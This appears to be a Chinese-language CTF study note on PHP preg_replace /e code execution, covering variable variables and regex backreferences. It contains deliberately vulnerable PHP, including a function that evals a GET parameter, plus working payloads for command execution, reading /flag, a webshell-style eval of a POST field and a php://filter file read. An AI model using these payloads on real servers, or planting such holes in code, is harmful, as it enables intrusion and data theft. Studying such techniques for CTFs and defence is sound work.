/e 可执行模式，此为PHP专有参数，例如preg_replace函数。
preg_replace(
    string|array $pattern,
    string|array $replacement,
    string|array $subject,
)
/e模式下
在subject字符中正则匹配pattern，匹配成功则执行$replacement

<?php 
echo preg_replace("/test/e",$_GET["h"],"jutst test"); 
?> 
高版本中不支持preg_replace函数
payload中;不加也行

<?php
  $change_name = 'hello';
  $hello = 'Hello World'; 
  echo $$change_name; //echo $hello
?>

<?php
  $a = 'hello';
  $$a = 'world'; //$hello=world
  echo "$a $hello";
  echo "$a ${$a}"; //$a $hello
  echo '${$a}';    //单引号不解析原样输出${$a}
?>

<?php
    error_reporting(0);

    function complexStrtolower($regex, $value){
        return preg_replace('/('.$regex.')/ei', 'strtolower("\\1")', $value);
    }

    foreach($_REQUEST as $regex => $value){
        echo complexStrtolower($regex, $value) . "\n";
    }

    highlight_file(__FILE__);
?>

 return preg_replace('/('.$regex.')/ei', 'strtolower("\\1")', $value);

strtolower("\\1")

因为字符串中的特殊字符需要转义， 所以 \\1 实际上就是 \1 , 而 \1在正则表达式中表示反向引用。
反向引用：
对一个正则表达式模式或部分模式两边添加圆括号将导致相关匹配存储到一个临时缓冲区中，所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从1开始，最多可存储99个捕获的子表达式。每个缓冲区都可以使用 \n访问，其中n为一个标识特定缓冲区的一位或两位十进制数。

?text=data:text/plain,I%20have%20a%20dream&file=php://filter/convert.base64-encode/resource=next.php

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

?.*={${getFlag()}}&cmd=system('ls');

[\s]表示，只要出现空白就匹配

[\S]表示，非空白就匹配

?\S*=${getFlag()}&cmd=system('cat /flag');

?\S*=${eval($_POST[pass])}